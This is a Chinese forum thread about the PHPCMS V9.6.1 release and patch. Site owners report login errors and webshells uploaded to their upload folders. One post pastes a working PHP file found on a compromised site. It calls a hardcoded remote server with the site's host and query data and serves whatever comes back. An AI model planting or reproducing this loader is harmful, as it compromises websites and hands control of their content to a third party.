楼主: mayuhui

[程 序] PHPCMS V9.6.1 正式版及升级补丁

    [复制链接]
发表于 2017-4-13 11:31:36 | 显示全部楼层
我升级了  phpsso   登陆 一直验证码错误:Q:Q:Q:Q
回复 支持 反对

使用道具 举报

发表于 2017-4-13 13:43:13 | 显示全部楼层
感谢官方升级
回复 支持 反对

使用道具 举报

发表于 2017-4-13 14:00:39 | 显示全部楼层
昨天还花了120块钱打了阿里的补丁,uploadfile里居然被人传了3个木马
回复 支持 反对

使用道具 举报

发表于 2017-4-13 14:20:47 | 显示全部楼层
现在登录好像老出现‘’失败‘’?
回复 支持 反对

使用道具 举报

发表于 2017-4-13 14:51:05 | 显示全部楼层
麻烦请问  网站根目录在哪?
回复 支持 反对

使用道具 举报

发表于 2017-4-13 15:15:48 | 显示全部楼层
cslrjerry 发表于 2017-4-13 14:00
昨天还花了120块钱打了阿里的补丁,uploadfile里居然被人传了3个木马

都是同样的攻击,一句话木马,全是php文件,草
回复 支持 反对

使用道具 举报

发表于 2017-4-13 15:48:56 | 显示全部楼层
终于更新了~
回复 支持 反对

使用道具 举报

发表于 2017-4-13 20:18:23 | 显示全部楼层
Glamour 发表于 2017-4-13 15:15
都是同样的攻击,一句话木马,全是php文件,草

你的站现在怎样。我的打升级补丁后还一直受攻击,他妈的


回复 支持 反对

使用道具 举报

发表于 2017-4-13 20:28:00 | 显示全部楼层
<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://118.193.225.207";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>


这个是什么?我的网站天天有
回复 支持 反对

使用道具 举报

发表于 2017-4-13 22:08:59 | 显示全部楼层
还没整明白!占个位。。。
回复 支持 反对

使用道具 举报

发表于 2017-4-14 02:05:00 | 显示全部楼层
西北风 发表于 2017-4-13 20:18
你的站现在怎样。我的打升级补丁后还一直受攻击,他妈的

补丁打了虽然没有发现有新的php文件上传了,但仍然会创建目录
回复 支持 反对

使用道具 举报

发表于 2017-4-14 09:46:25 | 显示全部楼层
终于升级了。官方加油,期待更多
回复 支持 反对

使用道具 举报

 楼主| 发表于 2017-4-14 09:55:51 | 显示全部楼层
Glamour 发表于 2017-4-14 02:05
补丁打了虽然没有发现有新的php文件上传了,但仍然会创建目录

是不是上传的php木马没有清理干净?建议设置下禁止附件目录执行php
回复 支持 反对

使用道具 举报

发表于 2017-4-14 10:48:20 | 显示全部楼层
什么时候考虑把eval()这个函数替换掉吧,老是有**的人利用这个eval()放点小病毒什么的,烦人,主要求官方解决这个问题,替换掉eval()
回复 支持 2 反对 0

使用道具 举报

您需要登录后才可以回帖 登录 | 点击这里注册

本版积分规则

小黑屋|Archiver|phpcms网站管理系统 ( 京ICP备14011169 )

GMT+8, 2017-9-26 06:15 , Processed in 0.209660 second(s), 8 queries , Memcache On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表